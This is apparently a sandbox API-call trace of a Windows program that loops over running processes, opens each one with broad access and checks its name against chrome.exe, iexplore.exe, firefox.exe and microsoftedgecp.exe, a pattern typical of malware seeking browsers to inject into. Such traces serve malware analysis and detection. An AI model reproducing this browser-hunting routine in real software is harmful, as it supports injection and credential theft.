	[0227.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x60ec
	[0227.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.429] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.429] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.429] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.430] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.430] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x60f0
	[0227.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.431] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.431] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.432] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0227.433] CloseHandle (hObject=0x4fd0) returned 1
	[0227.433] Sleep (dwMilliseconds=0x64) 
	[0227.544] GetCurrentProcessId () returned 0x110
	[0227.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0227.550] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0227.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0227.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0227.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x60f4
	[0227.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.554] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.554] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.554] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.555] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x60f8
	[0227.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.556] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.556] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.557] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.557] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0227.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x60fc
	[0227.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.558] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0227.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.559] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.559] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0227.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.559] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6100
	[0227.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.560] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.561] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.561] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.561] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0227.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6104
	[0227.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.562] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0227.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.563] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.563] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0227.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.564] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0227.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6108
	[0227.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.565] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0227.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.565] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.565] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0227.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.566] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0227.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x610c
	[0227.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.567] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0227.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.567] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.568] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0227.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.568] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.568] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0227.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6110
	[0227.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.569] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.569] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.569] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.570] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.570] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6114
	[0227.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.571] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.571] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.571] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.572] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6118
	[0227.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.573] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.574] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.574] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x611c
	[0227.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.576] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.576] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.576] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.577] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6120
	[0227.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.578] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.578] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.578] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.579] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.579] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6124
	[0227.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.580] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.580] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.580] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.581] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6128
	[0227.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.582] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.582] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.583] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.583] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.583] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x612c
	[0227.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.584] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.584] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.585] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.585] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.585] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0227.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6130
	[0227.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.586] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0227.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0227.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.587] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6134
	[0227.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.588] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.589] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.590] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.590] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.590] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0227.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6138
	[0227.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.591] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.591] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.592] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x613c
	[0227.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.593] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.595] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6140
	[0227.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.595] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.596] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.597] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6144
	[0227.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.599] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0227.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6148
	[0227.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.600] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0227.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.600] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.601] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0227.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.601] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
